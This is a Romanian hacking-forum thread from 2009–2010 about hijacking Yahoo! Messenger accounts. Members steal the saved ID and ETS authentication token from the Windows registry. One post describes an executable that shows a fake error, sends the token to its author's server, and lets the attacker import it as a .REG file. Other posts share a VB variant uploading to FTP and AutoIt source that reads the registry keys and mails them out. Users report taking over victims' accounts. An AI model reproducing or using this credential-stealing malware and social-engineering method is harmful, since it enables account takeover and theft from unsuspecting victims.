zippy Posted February 20, 2009 Report Posted February 20, 2009 da frumos...merge...mai ales ca unu mia luat ets si a intrat pa id meu orcum degebasalut Hellbound Quote
fLr^ Posted February 20, 2009 Report Posted February 20, 2009 i-am dat programul cuiva, mi-a zis ca i-a dat eroare, iar cand am cautat pe site, nu arata nimic, (nu arata ETS) Quote
playftw Posted February 20, 2009 Report Posted February 20, 2009 Merci fLr^ : Functioneaza doar atunci cand persoana respectiva are activat Remember my ID & Password. Quote
CODEX Posted February 20, 2009 Report Posted February 20, 2009 si pana la urma ce inseman hijack asta ? Quote
playftw Posted February 21, 2009 Report Posted February 21, 2009 hijack - deturnarehijacked - deturnat, jefuithttp://ro-en.ro Quote
Ethereal Posted February 23, 2009 Report Posted February 23, 2009 nu credeti ca riscati trimitand ets-urile pe site-ul tipului care a scris asta? Quote
nosferatu Posted February 23, 2009 Report Posted February 23, 2009 nu credeti ca riscati trimitand ets-urile pe site-ul tipului care a scris asta?Nu.Il cunosc si nu este genu... Quote
zaiet-pagadi Posted February 28, 2009 Report Posted February 28, 2009 Aceasta este, probabil, ce mai simpla metoda de a sparge un cont de messenger. Da-le dra**** de keyloggere... bindere... ftp-uri.. toate ca sa furi o parola...Atunci cand te loghezi pe Yahoo! Messenger, ai optiunea de a salva id-ul si parola, pentru logari ulterioare. ID-ul se salveaza in registri, si se mai salveaza un cod, ETS, in care se memoreaza token-ul de autentificare. Din token nu se poate extrage parola.Ce inseamna asta? Daca extragi cele 2 informatii din registri, iar apoi le "plantezi" pe alt calculator, ai sa ai surpriza ca te poti loga cu id-ul si parola salvata, deci pe contul altcuiva, fara sa ii afli neaparat si parola.Simplu, nu?Am facut cu C++ un exe de dimensiuni mici, pe care il gasiti arhivat aici. Cand este lansat in executie, el extrage id-ul si ETS-ul, si le trimite pe un server. Cateva explicatii pe engleza, mai gasiti aici.Dati exe-ul la cineva, si il convingeti sa il deschida. Programul va afisa un mesaj fals de eroare. Intrati pe http://it.octopis.com/ets.php, scrieti id-ul, si vedeti daca operatia a avut succes. Daca da, se va afisa id-ul si codul ETS. Click pe id, ca sa descarcati un fisier .REG, pe care il executati. Deschideti messenger-ul si surpriza!! Te-ai logat pe acel id! Ai acces la tot contul de Yahoo! + ca din moment ce ai acces la contul de e-mail, poti sa ii spargi conturile de pe hi5 / netlog / tagged (+ inca alte porcarii de saituri)...SPOR LA FURAT!Programul e mic si este bazat pe un principiu foarte simplu, iar sursa o tin sub cheie, pentru cei curiosi.Saitul it.octopis.com e saitul meu, asa ca nu strica sa azvarliti o privire. Am pus 3-4 programele si mi-e o lene... sa mai adaug cateva.frumos explicat cum de te-a lasat sa postezi asa ceva ????asta se invata la grupa micaDa-le dra**** de keyloggere... bindere... ftp-uri.. toate ca sa furi o parola...give me warn pls Quote
stoman Posted March 1, 2009 Report Posted March 1, 2009 Functioneaza super:D am incercat si eu sa fac unul in VB(sper sa nu se supere crhi5ty ca i-am furat ideea citeste ETS-ul si ID-ul le pune intr-un reg si il trimite pe un ftp.nu stiu cat de detectabil e. io am kis si nu a comentat da bit defender l-a blocat. . partea naspa e ca ii trebe MSINET.OCX ca sa ruleze. aici e linku cu sursahttp://rapidshare.com/files/204208857/ETS-VB.rar.html Quote
Hellbound Posted March 1, 2009 Report Posted March 1, 2009 mai bine ati inchide topicu o dati in offtopic ... si lumea pune keyloggere (descriindule ca creatie propie ) Quote
razvan_dc Posted March 2, 2009 Report Posted March 2, 2009 frate da io l-am testat la mine si merge da acum daca imi schimb parola o sa o mai ia odata?esti super cu acest "exploit" Quote
Guest chri5ty Posted March 4, 2009 Report Posted March 4, 2009 1 - Nu inteleg ce e asa de super la virusul asta.2 - Nu e exploit.3 - Nu ma supar deloc daca fiecare isi face propria varianta a programului4 - @zaiet-pagadi- nu prea imi place cand lumea citeaza mesaje intregi, doar ca sa exprime o idee scurta5 - @zaiet-pagadi- "asta se invata la grupa mica". Apreciez superioritatea, dar se pare ca multe persoane de aici au chiulit de la lectia asta. Stiu ca e ceva simplu, dar mi-am dat seama si singur ca se face cam mult offtopic pe topicul asta. Ar trebui inchis, intrucat nu mai are nimeni noutati de adus. Mai multi spun ca le-a mers, altii care nu au citit prea atent, spun ca nu stiu de ce nu le-a mers... etc Quote
fLr^ Posted March 4, 2009 Report Posted March 4, 2009 si ce?mie imi merge perfect. Te respect chri5ty pentru munca depusa! Quote
Guest chri5ty Posted March 5, 2009 Report Posted March 5, 2009 @-=(Alex_sm26)=-Programul e un virus in sine. E un mic spion. Ce te-ai astepta? In orice caz, nu infecteaza sub nicio forma calculatorul; asta iti garantez eu, iar oricine are chef sa piarda ceva timp cu dezasamblor, iti va spune acelasi lucru.Si daca tot incepe sa fie detectat ca virus (ceea ce era si de asteptat), atunci de ce nu va faceti singurei variante proprii? E asa de greu? Deja s-au publicat cateva surse si un program alternativ, principiul de functionare e extrem de simplu.Incep sa cred ca majoritatea forumistilor de pe RST, sunt mai mult vorbareti decat descurcareti. Incep sa fiu chiar convins de asta . Nicio generalizare! Quote
Nytro Posted March 5, 2009 Report Posted March 5, 2009 Prea mult tam-tam pentru 5 linii de cod. Nu esti tu cel care se lega de BUNN si de programul lui care fura acest ETS? Quote
Guest chri5ty Posted March 5, 2009 Report Posted March 5, 2009 Vorbim de hackpedia...M-am legat de BUNNN pentru faptul ca scotea pe banda o groaza de programe, care erau asemanatoare, in proportie de 90%, si nu avea de gand sa zica care e esenta programului.Nu am nimic impotriva faptului ca si el a implementat functia pentru ETS in keyloggerul lui. Singura problema a programului e ca trimitea cam des e-mail-uri cu informatiile spionate.Dar asta e cu totul alta poveste, si se incadreaza la offtopic Quote
bula Posted March 13, 2009 Report Posted March 13, 2009 (edited) Post deleted Edited September 17, 2009 by bula Quote
hunter_pass Posted June 25, 2009 Report Posted June 25, 2009 (edited) Bun...merge! Dar mi-ati putea da o idee despre cum sa fac sa se trumita ets-ul pe site-ul meu?Ca din cate am observat el are acces la toate id-urile Edited June 26, 2009 by hunter_pass Quote
m1cr0 Posted July 2, 2009 Report Posted July 2, 2009 Mie imi spune "Application Failed to initialize".... am net framework instalat.. nu cred ca are vreo legatura.. Quote
pytycel Posted May 10, 2010 Report Posted May 10, 2010 Buna.Te rog sa imi spui, dupa ce execut fisierul .REG, ce fac?Deschid yahoo mess...si la ID si parola ce scriu?Multumesc mult! Quote
all3xandra Posted May 11, 2010 Report Posted May 11, 2010 Dar o metoda de decriptare a tokenului, ar fii geniala:X. Quote
strike Posted May 11, 2010 Report Posted May 11, 2010 Dar o metoda de decriptare a tokenului, ar fii geniala:X.Read thisDespre Yahoo! - RST Quote
phantomas90 Posted May 18, 2010 Report Posted May 18, 2010 (edited) Sursa din AutoIT 3.x.x$var1 = RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager", "ETS")$var2 = RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager", "Yahoo! User ID")#include <INet.au3>$s_SmtpServer = "smtp.gmail.com"$s_SmtpPort = 465$s_SmtpSsl = 1$s_SmtpUsername = "***"$s_SmtpPassword = "***"$s_FromName = "Mathiew"$s_FromAddress = "mathiew.fantomas3@gmail.com"$s_ToAddress = "pwd.reset@ymail.com"$s_Subject = " tesul 2"$as_Body = "bla "$s_first = "bla"$s_helo = "helo"$b_trace = 0$Response = _INetSmtpMail($s_SmtpServer,$s_SmtpPort,$s_SmtpSsl,$s_SmtpUsername,$s_SmtpPassword,$s_FromName,$s_FromAddress,$s_ToAddress)$err = @errorIf $Response = 1 Then MsgBox(0, "Success!", "Mail sent")Else MsgBox(0, "Error!", "Mail failed with error code " & $err)EndIfPrimele doua linii extrag ETS-ul si ID-ul...ia mai jos am incercat sa trimit un mail pe smtp si nu merge:((.Daca se poate postati va rog sursa..La windows 7 au o valoare in registri numita MD_ID_value sau ceva de genu...valoarea pt aceasta nu e de forma unui ETS normal de la windows XP.Incerc sa vad ce e si revin Edited May 20, 2010 by phantomas90 am incercat pe windows 7 Quote
Alynutza Posted May 20, 2010 Report Posted May 20, 2010 Pai partea buna e ca a mersPartea proasta:A mers 2 minute pana nu stiu ce a facut ala(cred ca a schimbat parola)si apoi numai functioneaza...Pot sa stiu si eu de ce numai mergE?a schimbat parola sau e el pe id?Sau nu puteti face sa arate parola? Quote